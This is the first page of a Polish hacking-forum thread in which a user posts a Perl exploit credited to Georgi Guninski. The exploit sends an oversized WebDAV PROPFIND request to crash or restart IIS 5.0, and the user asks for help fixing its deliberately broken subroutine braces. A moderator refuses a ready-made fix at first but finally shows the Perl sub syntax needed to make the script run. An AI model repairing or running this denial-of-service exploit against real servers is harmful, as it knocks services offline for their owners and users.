Strona 1 z 3 123 OstatniOstatni
Pokaż wyniki 1 do 10 z 22

Temat: Exploit na MS Webserver 5.0

  1. #1
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie Exploit na MS Webserver 5.0

    HELLo
    jest sobie taki exploit:

    Kod:
    #!/usr/bin/perl
    # Written by Georgi Guninski
    use IO::Socket;
    
    print "IIS 5.0 propfind\n";
    
    $port = @ARGV[1];
    $host = @ARGV[0];
    
    sub vv()
     
    $ll=$_[0]; #length of buffer
    $ch=$_[1];
    $over=$ch x $ll; #string to overflow
    
    $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP"
    ) || return;
    #$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."
    $over".':"><a:prop><a:displayname />'."<u:$over />".'</a:
    prop></a:propfind>'."\n\n";
    # ^^^^ This is another issue and also works with length ~>65000
    
    $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."
    over".':"><a:prop><a:displayname />'."<u:$over />".'</a:p
    rop></a:propfind>'."\n\n";
    $l=length($xml);
    $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n"
    ;
    syswrite($socket,$req,length($req));
    print ".";
    $socket->read($res,300);
    #print "r=".$res;
    close $socket;
     
    do vv(128008,"V"); # may need to change the length
    sleep(1);
    do vv(128008,"V");
    print "Done.\n";

    Służy on do restartu MS Webserver 5.0, niestety... przy probie uruchomienia otrzymuje taki komunikat:

    Illegal declaration of subroutine main:vv at c:\(no nieważne :P) line 17

    czyli jak rozumiem cos nie tak jest z: "sub vv()", czy jakis programator mógłby to poprawić? Z gory dziekuje
    http://gogulas.yoyo.pl/h.gif

  2. #2
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    ... alez drogi Watsonie!

    Lupy tu nie trzeba, od razu widac czego brakuje
    Przyjrzyj sie linijkom kodu i zaraz bedziesz wiedzial hehe.

    Temat zamykam - chce abys do tego sam doszedl a sprawa banalnie prosta!
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  3. #3
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Watek otworzony i wracamy z dyskusja tutaj zamiast dyskutowac w innym threadzie http://hack.pl/forum/showthread.php?p=15589#post15589

    sub to poczatek deklaracji procedury - zobacz do manuala czego brakuje...
    Po dodaniu doslownie 2 bajtow dostalem:

    Kod:
    $ ./gogulas.pl 
    IIS 5.0 propfind
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  4. #4
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Nie znam perla ni w ząb, a poznawanie go od strony poprawiania bledow w skladni jest nieco... denerwujace, moglbys napisac co tam trzeba zmienic?
    http://gogulas.yoyo.pl/h.gif

  5. #5
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Juz napisalem - man perl.
    Nie podam Ci gotowca, nie ma mowy - po to wlasnie autor celowo usunal te 2 znaki.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  6. #6
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    o jakich 2 znakach mowisz
    o vv()

    dobra, udzial nam nauki mentorze na przyszlosc

  7. #7
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    daj chciaz link do jakis manuali, bo na kompie tego nie mam, a a na necie 404 error, nawet te po angielsku :P
    gdzie ten blad jest, w "$over=$ll x $ch;" ?
    http://gogulas.yoyo.pl/h.gif

  8. #8
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Aaaarghhhhhhhhh!!!!!

    dokumentacja w google - man perlfunc - pierwszy link, haslo 'sub'
    wez jakikolwiek inny kod wperlu i zobacz jak deklarowany jest sub()
    Ostatnio edytowane przez TQM : 10-19-2007 - 14:20
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  9. #9
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    nie mam bladego co trzeba zmienic, co inngo mowisz Ty, a co innego głosi error...
    http://gogulas.yoyo.pl/h.gif

  10. #10
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Zobacz jak sie delklaruje procedury w perlu - masz to praktycznie w prawie kazdym skrypcie.

    Pierwszy i ostatni raz podaje rozwiazanie na tacy... czas ruszyc glowa albo dac sobie spokoj z taka zabawa - przemysl to.

    Kod:
    sub nazwa (parametry) {
        # kod
    }
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Strona 1 z 3 123 OstatniOstatni

Podobne wątki

  1. Exploit
    By eryk in forum Newbie - dla początkujących!
    Odpowiedzi: 5
    Autor: 05-05-2007, 11:45
  2. Exploit
    By Xzar in forum Hacking
    Odpowiedzi: 2
    Autor: 03-18-2007, 21:56
  3. Exploit
    By northdakota in forum Hacking
    Odpowiedzi: 4
    Autor: 03-16-2007, 19:47
  4. Exploit
    By Golini in forum Hacking
    Odpowiedzi: 2
    Autor: 12-04-2006, 06:45
  5. Exploit
    By kasztan14 in forum Hacking
    Odpowiedzi: 5
    Autor: 11-27-2006, 22:05

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj